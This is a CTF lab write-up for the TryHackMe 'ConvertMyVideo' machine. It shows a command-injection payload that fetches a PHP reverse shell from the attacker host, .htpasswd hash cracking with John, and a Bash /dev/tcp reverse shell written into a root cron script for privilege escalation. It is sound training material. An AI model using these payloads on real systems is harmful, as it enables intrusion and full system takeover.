ctfwriteup.com
House of NotePwnie Island
Search…
whoarewe
picoCTF
picoMini 2020
picoCTF 2021
picoMini 2021
redpwnCTF
redpwnCTF 2021
Crypto CTF
Crypto CTF 2021
Wargame
Jarvis OJ
ROP Emporium
pwnable.kr
Hack The Box
Starting Point
Retired Machines
TCM Academy
TCM Linux Privilege Escalation Course
TryHackMe - Simple CTF (Easy)
TryHackMe - Vulnversity (Easy)
TryHackMe - CMesS (Medium)
TryHackMe - UltraTech (Medium)
TryHackMe - LazyAdmin (Easy)
TryHackMe - Anonymous (Medium)
TryHackMe - tomghost (Easy)
TryHackMe - ConvertMyVideo (Medium)
TryHackMe - Brainpan 1 (Hard)
TCM Windows Privilege Escalation Course
Powered By GitBook
TryHackMe - ConvertMyVideo (Medium)
{"author" : ["ret2basic"]}

Summary

Port 80 hosts a "Convert My Video" service, which is a GUI wrapper of youtube-dl. Intercept the request with Burp and analyze it. Here we use command injection to transfer a PHP reverse shell payload to the victim machine and get a user shell as www-data.
In the privilege escalation phase, pspy finds a script gets executed as root every minute or so. Moreover, www-data has write permission on that script. Here we overwrite the script with a Bash reverse shell payload and catch a reverse shell as root.

IP

  • RHOST: 10.10.108.142
  • LHOST: 10.13.12.2

Nmap

Nmap

Asset Discovery

Run Gobuster:
1
gobuster dir -u http://convertmyvideo.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Copied!
Gobuster finds /admin:
Gobuster
http://convertmyvideo.thm/admin prompts a login form but we don't know the credential yet:
/admin

www-data Shell: Command Injection

Use 1337 as input, capture the request and send it to Repeater:
Repeater
Try command injection:
id
It works. Now let's try to transfer a PHP reverse shell payload to the victim machine. Start a HTTP server:
1
updog -p 80
Copied!
Use the following payload to transfer the PHP reverse shell payload:
1
`wget${IFS}http://10.13.12.2/php-reverse-shell.php`
Copied!
Here ${IFS} must be used to represent space, otherwise the syntax of the payload will be interpreted incorrectly. Send this request:
wget
Trigger the payload at http://convertmyvideo.thm/php-reverse-shell.php and catch a reverse shell as www-data:
www-data shell

User Shell: Password Cracking

In /var/www/html/admin, we fidn .htaccess and .htpasswd:
/var/www/html/admin
Recall that http://convertmyvideo.thm/admin prompts a login form and we did not know the credential. Here .htaccess and .htpasswd are responsible for this login form. The .htpasswd file contains a password hash and we should try to crack it using John:
1
john htpasswd -w=/usr/share/wordlists/rockyou.txt
Copied!
The credential is itsmeadmin:jessie:
Credential
We won't use this credential though: it is possible to become root from www-data directly.

Privilege Escalation: Cronjob + Weak Permission

Transfer pspy64 to the victim machine. Note that /var/www/html/tmp/clean.sh is executed as root by some cronjob:
pspy64
We (www-data) have write permission on this script:
Write permission
Start a pwncat listener and write Bash reverse shell into /var/www/html/tmp/clean.sh:
1
echo 'bash -i >& /dev/tcp/10.13.12.2/1337 0>&1' > /var/www/html/tmp/clean.sh
Copied!
Catch a reverse shell as root:
root shell
Previous
TryHackMe - tomghost (Easy)
Next
TryHackMe - Brainpan 1 (Hard)
Last modified 10d ago
Copy link
Contents
Summary
IP
Nmap
Asset Discovery
www-data Shell: Command Injection
User Shell: Password Cracking
Privilege Escalation: Cronjob + Weak Permission